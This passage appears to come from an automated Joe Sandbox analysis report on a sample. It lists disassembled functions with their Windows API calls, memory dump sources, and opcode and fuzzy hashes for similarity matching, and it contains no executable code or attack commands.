                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E318271584345DEFF359B64D849BB63BA8AB0130AF084659DCA6C22B0E7B494CDCB32
                                                                                                                                                                                                                                                                  Function 00D4224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D42262
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 00D4230E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00D42316
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00D42327
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00D4232F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                  • Opcode ID: e401e23159a83a3a34f2c94b6edb0e6058f03954b09458e57d0da94c288e90c7
                                                                                                                                                                                                                                                                  • Instruction ID: 7c97113ee16d7d6da49d7ac48878bed180c8f1068b0c738970e35803c4037a30
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e401e23159a83a3a34f2c94b6edb0e6058f03954b09458e57d0da94c288e90c7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731D471900219EFDB14CFA8CD89AEE3BB6EF14325F504229F925E72D0D7B09944DBA0
                                                                                                                                                                                                                                                                  Function 00D5D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5D97D
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00D5D9B4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5D9F9
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5DA0D
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5DA37
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                  • Opcode ID: d9becde0b25776df3cca0751e57f97e86f4951e0a8a3c1b7c25a90871e5e22c5
                                                                                                                                                                                                                                                                  • Instruction ID: c9b822813ef0fbfcfe47f3d896cc59e89af649138164b95e709f0649c86fb11e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9becde0b25776df3cca0751e57f97e86f4951e0a8a3c1b7c25a90871e5e22c5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F312871504305AFDB24DFA5D884AABBBFAEB14352B14442EE94AD2250E730AE459F70
                                                                                                                                                                                                                                                                  Function 00D761A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D761E4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D7623C
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7624E
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D76259
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D762B5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 763830540-0
                                                                                                                                                                                                                                                                  • Opcode ID: e0357de2d97e78e3c2737103f65708526b5103a5f73055d1ec2c6ce8d1f9d85e
                                                                                                                                                                                                                                                                  • Instruction ID: 5e225db8ac701a56948dc699dab055c9fd28fb7d906ec4c73d702bb92f0073d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0357de2d97e78e3c2737103f65708526b5103a5f73055d1ec2c6ce8d1f9d85e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F82193759006189ADB119F60DC84EEEBBB9EF04310F148256FA2DEA184F770C985CF71
                                                                                                                                                                                                                                                                  Function 00D6138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00D613AE
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00D613C5
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D61401
                                                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00D6140D
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00D61445
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                  • Opcode ID: 94f5df185057b6821c398c3cb30205dbd6f5fc1eb5b1821958f92e1ca91e8931
                                                                                                                                                                                                                                                                  • Instruction ID: 4c95587d797b5d3dc8eb4a060397621b123b78d32ae09822558923db704c77b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94f5df185057b6821c398c3cb30205dbd6f5fc1eb5b1821958f92e1ca91e8931
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70216036600214AFDB04EF65CC85AAEBBF5EF48341B088469F85AD7752DB30AD44DBA0
                                                                                                                                                                                                                                                                  Function 00D1D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D1D146
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1D169
                                                                                                                                                                                                                                                                    • Part of subcall function 00D13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D1D18F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1D1A2
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1D1B1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                                                  • Opcode ID: cb71663be3986fb2bc3933e87ce67b3c57e3ff4e42f2a55f901e585d66423b7d
                                                                                                                                                                                                                                                                  • Instruction ID: a988a254f6b0b06bed96e7de84e2e28772d48d6cbb1e4710cfbfde1adb6b772f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb71663be3986fb2bc3933e87ce67b3c57e3ff4e42f2a55f901e585d66423b7d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 940171766057557F27216AA6BC88DBB7A7FDFC2BA13180129BD08C6244EF708DC181B0
                                                                                                                                                                                                                                                                  Function 00D46078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _memcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                  • Opcode ID: a5b2114a2257fff51d5fa2212ed77d7c510e449dde03520a5e76f66efce86b19
                                                                                                                                                                                                                                                                  • Instruction ID: 26e84827b9ac510be1ad83d6792b9741665b5a31377c683e24fb621909d315cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5b2114a2257fff51d5fa2212ed77d7c510e449dde03520a5e76f66efce86b19
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E90175A6600706FBD71566219C42FAB735DDE523A8F044025FE0B9A281E761ED18C2B2
                                                                                                                                                                                                                                                                  Function 00D1316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0000000A,?,?,00D0F64E,00D0545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D13170
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D131A5
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D131CC
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D131D9
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D131E2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                  • Opcode ID: 76b5c1a3586d6e9b4322564f9f60e4405849271e3be20581faeebcbe0a9bd9de
                                                                                                                                                                                                                                                                  • Instruction ID: 97e4da8d182c681e0dbcc54484159006625ac2dd3ac8ea064d848a0b2d5df562
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76b5c1a3586d6e9b4322564f9f60e4405849271e3be20581faeebcbe0a9bd9de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E01A4B66847407B96126635FC8AEEB366AEFC17717240428F819D2291EE22CBC24271
                                                                                                                                                                                                                                                                  Function 00D408FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?,?,00D40C4E), ref: 00D4091B
                                                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40936
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40944
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?), ref: 00D40954
                                                                                                                                                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40960
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                  • Opcode ID: f1f8f8dfcc3d27851a355ce8f460c9995768401e7d265a584171cc927936ea50
                                                                                                                                                                                                                                                                  • Instruction ID: 6882f16acd35f83a4f01115f78a7bcd09dd233547800bed2f983b5400d618e6e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1f8f8dfcc3d27851a355ce8f460c9995768401e7d265a584171cc927936ea50
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E017872600304AFEB104F55DC44B9A7EBEEF88792F180124FA09E6212E771DD80DBB0
                                                                                                                                                                                                                                                                  Function 00D4F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D4F2AE
                                                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 00D4F2BC
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00D4F2C4
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D4F2CE
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                  • Opcode ID: 42f73447bbbcde744dd53aa0c7dfd0bd73b5c13ce94a5d9e23404d62558e4853
                                                                                                                                                                                                                                                                  • Instruction ID: 862f8c7928fa23c57e08f0807bcab98af55a1154dde8570a2cfc8812fb41d9e2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f73447bbbcde744dd53aa0c7dfd0bd73b5c13ce94a5d9e23404d62558e4853
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51015771C01629EBCF00AFA4E84DAEEBBB9FF08710F400466E941F2260EB309594C7B5
                                                                                                                                                                                                                                                                  Function 00D41A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D41A60
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A6C
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A7B
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A82
                                                                                                                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D41A99
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                                                                                                                                                  • Opcode ID: 602b378ad127b7b2ae8410df7eebec5763e11dc700dbc4c9dae16fb1b3a72470
                                                                                                                                                                                                                                                                  • Instruction ID: 0f43ec2f0260cbd998d295b13c8ca9be2c161fffd694b388fff41b6b579375b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 602b378ad127b7b2ae8410df7eebec5763e11dc700dbc4c9dae16fb1b3a72470
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67018CB9601305BFDB114FA4EC49E6A3B7EEF883A4B250424F849D7360EB31DC818A70
                                                                                                                                                                                                                                                                  Function 00D41960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D41976
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D41982
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D41991
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D41998
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D419AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                                                                                                                                  • Opcode ID: 96b9b7e0ed409e1b16f41c9156197aae6fd3644de68bd6f962fbc8f4ae59cdf4
                                                                                                                                                                                                                                                                  • Instruction ID: a7901e7749ee3c17b0fbc4f650daaf5a533f81f186624edd4c1d4c32b64e3007
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96b9b7e0ed409e1b16f41c9156197aae6fd3644de68bd6f962fbc8f4ae59cdf4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F06D79200301ABDB214FA4EC59F563BBEFF897A0F140414FE49D73A0EA70E8808A70
                                                                                                                                                                                                                                                                  Function 00D41900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
